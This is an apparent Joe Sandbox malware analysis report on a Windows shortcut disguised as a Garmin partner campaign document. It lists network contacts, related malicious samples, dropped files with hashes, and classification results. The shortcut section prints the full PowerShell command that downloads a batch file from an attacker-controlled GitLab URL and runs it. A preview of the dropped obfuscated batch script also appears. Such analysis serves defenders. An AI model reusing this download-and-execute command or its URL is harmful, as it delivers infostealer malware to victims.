https://aka.ms/pscore68	powershell.exe, 0000000F.00000002.2224731433.00000210DBF11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.3322903570.000001C8590F1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://docs.sandbox.google.com/presentation/fsip/	powershell.exe, 0000000F.00000002.2224731433.00000210DD557000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD553000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD533000.00000004.00000800.00020000.00000000.sdmp	false		high
https://dl-web.dropbox.com/	powershell.exe, 0000000F.00000002.2224731433.00000210DD557000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD553000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD533000.00000004.00000800.00020000.00000000.sdmp	false		high
https://app.hellofax.com/	powershell.exe, 0000000F.00000002.2224731433.00000210DD557000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD553000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD533000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cfl.dropboxstatic.com/static/	powershell.exe, 0000000F.00000002.2224731433.00000210DD533000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.paypal.com/sdk/js	powershell.exe, 0000000F.00000002.2224731433.00000210DD557000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD553000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD533000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.dropbox.com/scl/fi/4p5pc2fbhxx7mz0qnortk/Garmin_Campaign_Information_for_Partners_V3.doc	powershell.exe, 0000000F.00000002.2224098465.00000210D9E60000.00000004.00000020.00020000.00000000.sdmp	false		high
https://docs.google.com/spreadsheets/fsip/	powershell.exe, 0000000F.00000002.2224731433.00000210DD557000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD553000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD533000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist	powershell.exe, 0000000F.00000002.2224731433.00000210DD557000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD553000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2224731433.00000210DD533000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
172.65.251.78	gitlab.com	United States		13335	CLOUDFLARENETUS	false
162.125.65.18	www-env.dropbox-dns.com	United States		19679	DROPBOXUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1573660
Start date and time:	2024-12-12 13:04:09 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 52s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	20
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	3_Garmin_Campaign Information for Partners(12-11).docx.lnk.download.lnk
Detection:	MAL
Classification:	mal100.troj.evad.winLNK@32/17@4/2
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 8 Number of non-executed functions: 3
Cookbook Comments:	Found application associated with file extension: .lnk

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 13.107.246.63, 52.149.20.212
Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target powershell.exe, PID 6456 because it is empty
Execution Graph export aborted for target powershell.exe, PID 6520 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing network information.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: 3_Garmin_Campaign Information for Partners(12-11).docx.lnk.download.lnk

Simulations

Behavior and APIs

Time	Type	Description
07:04:59	API Interceptor	116x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
172.65.251.78	build_setup.exe	Get hash	malicious	Vidar	Browse	gitlab.com/greg201/ppi3/-/raw/main/Setup.exe?inline=false
162.125.65.18	[EXTERNAL] Doug Lenon shared _GARY LEIMER INC SIGNED CONTRACT & PAY APPLICATIONS.paper_ with you.eml	Get hash	malicious	Unknown	Browse
	phish_alert_sp2_2.0.0.0.eml	Get hash	malicious	Unknown	Browse
	qxjDerXRGR.lnk	Get hash	malicious	RHADAMANTHYS	Browse
	taCCGTk8n1.lnk	Get hash	malicious	RHADAMANTHYS	Browse
	Updates.bat	Get hash	malicious	Abobus Obfuscator	Browse
	ljshdfglksdfNEW.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse
	QD40FIJ8QK.lnk	Get hash	malicious	Unknown	Browse
	https://www.dropbox.com/l/AADbLOqftgPkdsTWgBgFyNpmu-iGeYJGM4I	Get hash	malicious	Unknown	Browse
	https://t.ly/HThl-Link1-0312	Get hash	malicious	Unknown	Browse
	hnskldjf230.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
gitlab.com	garsukhjdf11.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	172.65.251.78
	1_Garmin_Campaign Information for Partners(12-10).docx.lnk.download.lnk	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	172.65.251.78
	nbavdfasfGarminde.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	172.65.251.78
	Updates.bat	Get hash	malicious	Abobus Obfuscator	Browse	172.65.251.78
	ljshdfglksdfNEW.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	172.65.251.78
	kjhsdg.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	172.65.251.78
	kjshdf.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	172.65.251.78
	kjsdhfgs.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	172.65.251.78
	7p5nITtglJ.lnk	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	172.65.251.78
	kjshdkfgjsdg.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	172.65.251.78
edge-block-www-env.dropbox-dns.com	751ietQPnX.lnk	Get hash	malicious	RHADAMANTHYS	Browse	162.125.69.15
	l92fYljXWF.lnk	Get hash	malicious	RHADAMANTHYS	Browse	162.125.69.15
	qxjDerXRGR.lnk	Get hash	malicious	RHADAMANTHYS	Browse	162.125.69.15
	taCCGTk8n1.lnk	Get hash	malicious	RHADAMANTHYS	Browse	162.125.69.15
	Richiesta di Indagine sulla Violazione del Copyright lnk.lnk	Get hash	malicious	Unknown	Browse	162.125.69.15
	interior-design-villa-a23.lnk	Get hash	malicious	MalLnk	Browse	162.125.69.15
	Updates.bat	Get hash	malicious	Abobus Obfuscator	Browse	162.125.69.15
	zW72x5d91l.bat	Get hash	malicious	Unknown	Browse	162.125.69.15
	ljshdfglksdfNEW.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	162.125.69.15
	kjhsdg.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	162.125.69.15
www-env.dropbox-dns.com	garsukhjdf11.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	162.125.69.18
	1_Garmin_Campaign Information for Partners(12-10).docx.lnk.download.lnk	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	162.125.69.18
	nbavdfasfGarminde.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	162.125.69.18
	[EXTERNAL] Doug Lenon shared _GARY LEIMER INC SIGNED CONTRACT & PAY APPLICATIONS.paper_ with you.eml	Get hash	malicious	Unknown	Browse	162.125.65.18
	phish_alert_sp2_2.0.0.0.eml	Get hash	malicious	Unknown	Browse	162.125.65.18
	751ietQPnX.lnk	Get hash	malicious	RHADAMANTHYS	Browse	162.125.69.18
	l92fYljXWF.lnk	Get hash	malicious	RHADAMANTHYS	Browse	162.125.69.18
	qxjDerXRGR.lnk	Get hash	malicious	RHADAMANTHYS	Browse	162.125.65.18
	taCCGTk8n1.lnk	Get hash	malicious	RHADAMANTHYS	Browse	162.125.65.18
	Richiesta di Indagine sulla Violazione del Copyright lnk.lnk	Get hash	malicious	Unknown	Browse	162.125.69.18

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
DROPBOXUS	garsukhjdf11.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	162.125.69.18
	1_Garmin_Campaign Information for Partners(12-10).docx.lnk.download.lnk	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	162.125.69.18
	nbavdfasfGarminde.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	162.125.69.18
	https://feji.us/m266he	Get hash	malicious	Unknown	Browse	162.125.69.18
	[EXTERNAL] Doug Lenon shared _GARY LEIMER INC SIGNED CONTRACT & PAY APPLICATIONS.paper_ with you.eml	Get hash	malicious	Unknown	Browse	162.125.1.20
	phish_alert_sp2_2.0.0.0.eml	Get hash	malicious	Unknown	Browse	162.125.40.3
	751ietQPnX.lnk	Get hash	malicious	RHADAMANTHYS	Browse	162.125.69.15
	l92fYljXWF.lnk	Get hash	malicious	RHADAMANTHYS	Browse	162.125.69.15
	qxjDerXRGR.lnk	Get hash	malicious	RHADAMANTHYS	Browse	162.125.69.15
	taCCGTk8n1.lnk	Get hash	malicious	RHADAMANTHYS	Browse	162.125.69.15
CLOUDFLARENETUS	https://www.amberdrinks.lt/	Get hash	malicious	Unknown	Browse	172.67.164.227
	garsukhjdf11.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	172.65.251.78
	1_Garmin_Campaign Information for Partners(12-10).docx.lnk.download.lnk	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	172.65.251.78
	nbavdfasfGarminde.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	172.65.251.78
	33abb.msi	Get hash	malicious	Unknown	Browse	172.64.41.3
	56ff7c.msi	Get hash	malicious	Unknown	Browse	162.159.61.3
	https://www.google.cv/url?duf=FbLLcAJXWZoeUZJIjST2&lfg=uVQGQao2QJuMH6TEkmpq&sa=t&fmc=XCKeeJBBTaVsgNFTQcDe&url=amp%2Fshairmylife.com%2Fkam%2FOATWMWQPC27P047EIPR32X/YWxpc29ub0B0aG9ydWsuY29t	Get hash	malicious	Unknown	Browse	104.17.25.14
	57ff67.msi	Get hash	malicious	Unknown	Browse	172.64.41.3
	http://productfocus.com	Get hash	malicious	Unknown	Browse	104.26.0.186
	427c7bdc-ea02-97de-e5ef-a2c58c2d0a48.eml	Get hash	malicious	Unknown	Browse	1.1.1.1

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	copia111224mp.hta	Get hash	malicious	Unknown	Browse	172.65.251.78 162.125.65.18
	garsukhjdf11.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	172.65.251.78 162.125.65.18
	1_Garmin_Campaign Information for Partners(12-10).docx.lnk.download.lnk	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	172.65.251.78 162.125.65.18
	nbavdfasfGarminde.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	172.65.251.78 162.125.65.18
	Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip	Get hash	malicious	Unknown	Browse	172.65.251.78 162.125.65.18
	https://www.google.cv/url?duf=FbLLcAJXWZoeUZJIjST2&lfg=uVQGQao2QJuMH6TEkmpq&sa=t&fmc=XCKeeJBBTaVsgNFTQcDe&url=amp%2Fshairmylife.com%2Fkam%2FOATWMWQPC27P047EIPR32X/YWxpc29ub0B0aG9ydWsuY29t	Get hash	malicious	Unknown	Browse	172.65.251.78 162.125.65.18
	RQ--029.msi	Get hash	malicious	AteraAgent	Browse	172.65.251.78 162.125.65.18
	3d#U0438.hta	Get hash	malicious	Unknown	Browse	172.65.251.78 162.125.65.18
	Agreement for Cooperation.PDF.lnk.download.lnk	Get hash	malicious	RedLine	Browse	172.65.251.78 162.125.65.18
	RFQ-004282A.Teknolojileri A.S.exe	Get hash	malicious	AgentTesla	Browse	172.65.251.78 162.125.65.18

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Zip archive data, at least v1.0 to extract, compression method=store
Category:	dropped
Size (bytes):	68976560
Entropy (8bit):	7.994091835839617
Encrypted:	true
SSDEEP:	1572864:p20cEa6WWQ/PI5c9v4bTNyrOOBNzJTCW15s37:EIa6Ih6vUlBNzJTCi5I7
MD5:	7CB3BDEE3DDE5CB040A974BD4F5CE108
SHA1:	88777382C447994E610DE914E510BDC131D2E24F
SHA-256:	370D38E5279E35DF64A13E4EB9AC954BD58520BF2AAD83AE47072FC4D20AB0E9
SHA-512:	3CC5EC73A41BB9034F988CCB945667C0A200B447A14030CE2219DA279CF71368B1270673B24805CB95849EE4607328792A4EB50748F6BA72D6DD6D25352B8B9A
Malicious:	true
Preview:	PK........q.KY................Scripts/PK.........=VX0p(Kt...........Scripts/normalizer.exe..`.U.0.dk.'..e.....,..5..M...R6......B;....lM;...EG.g.Q.e..q.aS......T,.R...,.m.....{.......}..~o...}..s.=....p.....p...~,...:..g..>...G.P9..X.\|E....pYq.JSN..U..ii....b..6g.iean....x.....V...>.._.'G...R..k.\|a...n.}...S...9...A....3.[...Y..]...v...u...9.4.....h......c F..cf5.....AM.......@.......}1I.MC.....\|..U.%$..S..H........W..$....8.....C...qY..s..l....4......t...$...YY...LT=.UM..-Q..\4..W..L.)...........py...p..f.......fp.....hp.tJ.9<....t.l.PvZ.s. .^JVqB.^.S....Ni..lW.7-...^g\|......9N....k.7..%x.-.N.c9n'..b..-.5.46^%O-.39$O.O...=........9.h0.,O..8^/x.x.".}.$...&H...\.I.......nrH....0.z..J.&.$...r.......m...M.$..R. -...{Mw.t..'x...Z.X.Zo.......)..^.X($.5i>...{..NO^.\.s.Uj....h..?^-7u. A...:..l....."_.A..V.w.%.V.Xy.=.J.P.6.....vkU.....M...C.9....$.ERo.....`...c4.?!Gq$^.4.}..8.-@.Z..J_./d...b..o....q4_.T.>.v._....a.k!7.....(.9.Sj..O

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	9434
Entropy (8bit):	4.928515784730612
Encrypted:	false
SSDEEP:	192:Lxoe5qpOZxoe54ib4ZVsm5emdrgkjDt4iWN3yBGHVQ9smzdcU6Cj9dcU6CG9smAH:srib4ZIkjh4iUxsT6Ypib47
MD5:	D3594118838EF8580975DDA877E44DEB
SHA1:	0ACABEA9B50CA74E6EBAE326251253BAF2E53371
SHA-256:	456A877AFDD786310F7DAF74CCBC7FB6B0A0D14ABD37E3D6DE9D8277FFAC7DDE
SHA-512:	103EA89FA5AC7E661417BBFE049415EF7FA6A09C461337C174DF02925D6A691994FE91B148B28D6A712604BDBC4D1DB5FEED8F879731B36326725AA9714AC53C
Malicious:	false
Preview:	PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Temp\Updates.bat

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-16, little-endian text, with very long lines (16858), with no line terminators
Category:	dropped
Size (bytes):	33719
Entropy (8bit):	5.670062776683649
Encrypted:	false
SSDEEP:	384:eCdkcEAkO0xKyocPSXF4ZNwcKfMr60wFGmxg/o++6trVBdL802V9YAul:jd5EZO0fPYFKNwcK0r60wFf6o57y
MD5:	92529C13BB6162D355399B1585919E7A
SHA1:	F41A93EADC02F2ECA672D7B9CAF51862CFAFF4A1
SHA-256:	BB4A859DC82BB1E21294E65B574E6FCCE8D0ED2CFC36B01028F62A95B09EA8B2
SHA-512:	089647C9CB8F38192996653C0F5666AC1DA989F603F085194320DED3E83836555CCEE631AF35ADF88D13AFC514578102EF5D08E4929380460CA2785AFD9C37C1
Malicious:	true
Yara Hits:	Rule: JoeSecurity_AbobusObfuscator, Description: Yara detected Abobus Obfuscator, Source: C:\Users\user\AppData\Local\Temp\Updates.bat, Author: Joe Security
Preview:	....>nul 2>&1 &cls.;@@e%(...).( ._.)..(.._.)..(.._^.).(...)(...)%%(...).(.._.).(...)(.^..)(...).( ._.).%%.(.._.)..( ._.).(...)(...).( ._.)^.(...)%c^ho of%......^%^%......^%f&f%....^..%^%.^.....%OR /l %%i iN (1,1,1)Do (f%....^..%^%.^.....%OR /l %%i iN (1 1 1)Do (I^f %eRrorLeVel% E%(...).(^ ._.).(...)(...).( ._.).(...)%Q^%(...)(...)(...).(.._.).(...)(^...)%U 0 ex%(...)(...).(..^_.)..( ._.).(...)(...)%^i%(...).( ._.).(...).( ._.)..(.._.^)..( ._.).%%(...)(...)(.^..).(.._.)..( ._.)..( ._.).%t)).@@(@c^%(...).( ._.).(...).(^ ._.)..( ._.)..(.._.).%%.( ._.).

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5jk3wqfl.leh.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aappqgy0.ybx.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_acask3vz.k1m.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_avs4yr2h.ahn.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bj3xprun.jju.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gqxc2osv.efi.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o0hwys5x.eu4.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yhlkn0ba.atn.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Windows\System32\tmp

Download File

Process:	C:\Windows\System32\cmd.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	14
Entropy (8bit):	3.521640636343319
Encrypted:	false
SSDEEP:	3:Mrv:gv
MD5:	CE585C6BA32AC17652D2345118536F9C
SHA1:	BE0E41B3690C42E4C0CDB53D53FC544FB46B758D
SHA-256:	589C942E748EA16DC86923C4391092707CE22315EB01CB85B0988C6762AA0ED3
SHA-512:	D397EDA475D6853CE5CC28887690DDD5F8891BE43767CDB666396580687F901FB6F0CC572AFA18BDE1468A77E8397812009C954F386C8F69CC0678E1253D5752
Malicious:	false
Preview:	ECHO is off...

\Device\Null

Download File

Process:	C:\Windows\System32\find.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	36
Entropy (8bit):	3.8956388075276664
Encrypted:	false
SSDEEP:	3:gOmAe9qQn:xm/
MD5:	89D484A82D15549C8F4BF2B4D4F1E924
SHA1:	58F49E997A58A17C2902E08026BAC2DD16A34B1B
SHA-256:	040AE1183CD6102AC612B2D88C2816B358FDC4743BC9CD05376E797595167B40
SHA-512:	C0C920A9369FF9E28C9DAE6CA21AE7A1F9A79F2F4F8F97E247D133700FC446CEAA2C6C40116DE644CEA9336D9064792F3AD7011EBCBF5B6675779C57590F167B
Malicious:	false
Preview:	FIND: Parameter format not correct..

Static File Info

General

File type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Working directory, Has command line arguments, Icon number=1, Archive, ctime=Wed May 15 08:54:16 2024, mtime=Wed Dec 11 02:37:26 2024, atime=Wed May 15 08:54:16 2024, length=289792, window=hidenormalshowminimized
Entropy (8bit):	3.513637622566247
TrID:	Windows Shortcut (20020/1) 100.00%
File name:	3_Garmin_Campaign Information for Partners(12-11).docx.lnk.download.lnk
File size:	2'406 bytes
MD5:	226e454fb58db50a6ebcd890911ce3c1
SHA1:	5dc76d585b68596f22056345620f9d008b37adb1
SHA256:	e994c8193888e0d28828d08e2aacb40c05c7b43e9f572ec79b64cf56f7e6ac05
SHA512:	5350cfdd390aa2770319f2ffd6759f9f446dce458e70e5a4681b320528edb2235ed965e553ae4b7e1856381d69a1e6e8c70a65b40b84b3e894d8819b2405c8cc
SSDEEP:	48:8giYJdcRdJ6PhfkIcSuA1dIKaRXv3KabhzYk:8zYJdcRv4hfzWmduvKGzY
TLSH:	0641CB1537E91315E2F38E7B94BEE2018721B8A6E9129F5E41D0618C68E1601FC7AF7A
File Content Preview:	L..................F.... ....-\......a..}K..$.]......l......................5....P.O. .:i.....+00.../C:\...................V.1......YH...Windows.@........OwH.Yt...........................~V..W.i.n.d.o.w.s.....Z.1......Y.0..System32..B........OwH.YY.....@.

File Icon


Icon Hash:	74f4d4dcdcc9e1ed

Static Windows Shortcut Info

General
Relative Path:
Command Line Argument:	/c powershell -Command "$h='https://gitlab.com/stare2/garmin/-/raw/main/garsukhjdf11.bat'; $p=$env:TEMP+'\Updates.bat'; iwr $h -OutFile $p;start $p"
Icon location:	%SystemRoot%\System32\SHELL32.dll

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 12, 2024 13:05:01.949057102 CET	49707	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:01.949111938 CET	443	49707	172.65.251.78	192.168.2.6
